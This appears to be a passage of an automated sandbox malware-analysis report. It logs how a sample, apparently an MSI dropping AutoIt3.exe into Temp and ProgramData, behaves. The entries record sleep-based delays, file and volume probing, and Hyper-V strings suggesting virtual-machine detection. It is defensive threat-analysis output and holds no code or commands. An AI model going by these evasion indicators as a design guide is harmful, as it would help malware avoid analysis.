            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264Thread sleep time: -40647s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exe TID: 1264Thread sleep time: -117784s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 5092Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 6680Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7020Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 8012Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7500Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 5088Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 5796Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7672Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7944Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 6716Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7936Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 2788Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7980Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8088Thread sleep count: 144 > 30Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8076Thread sleep count: 521 > 30Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -53266s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -100936s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -47690s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -98379s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -74299s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -98773s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -35309s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -34527s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -78150s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -70488s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -66239s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -73944s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -68690s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -34428s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -87931s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -90734s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -98794s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -90071s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -92014s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -70098s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -118782s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -68075s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -98860s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -101240s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -52037s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -32379s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -76502s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072Thread sleep time: -118775s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7788Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7092Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 1460Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7892Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7964Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 1264Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7852Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7924Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7952Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 2144Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7340Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7808Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 6080Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 2452Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 5472Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7968Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7524Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 5484Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe TID: 3612Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7160Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 4120Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 3192Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7108Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7412Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7688Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7236Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7096Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7120Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeLast function: Thread delayed
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3433.tmpJump to dropped file
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeWindow / User API: threadDelayed 521Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeWindow / User API: foregroundWindowGot 827Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeWindow / User API: foregroundWindowGot 832Jump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_004517BC GetSystemInfo,9_2_004517BC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_004089B0 FindFirstFileA,9_2_004089B0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00408AB8 FindFirstFileA,9_2_00408AB8
            Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 42141Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 119333Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 38013Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 47979Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 58022Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 33161Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 44923Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 40647Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 117784Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 53266Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 100936Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 47690Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 98379Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 74299Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 98773Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 35309Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 34527Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 78150Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 70488Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 66239Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 73944Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 68690Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 34428Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 87931Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 90734Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 98794Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 90071Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 92014Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 70098Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 118782Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 68075Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 98860Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 101240Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 52037Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 32379Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 76502Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 118775Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile opened: C:\Program Files (x86)\adobe\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Jump to behavior
            Source: Autoit3.exe, 0000000D.00000002.596679945.0000000001A16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUp%j
            Source: cmd.exe, 0000000E.00000002.706196791.0000000003337000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
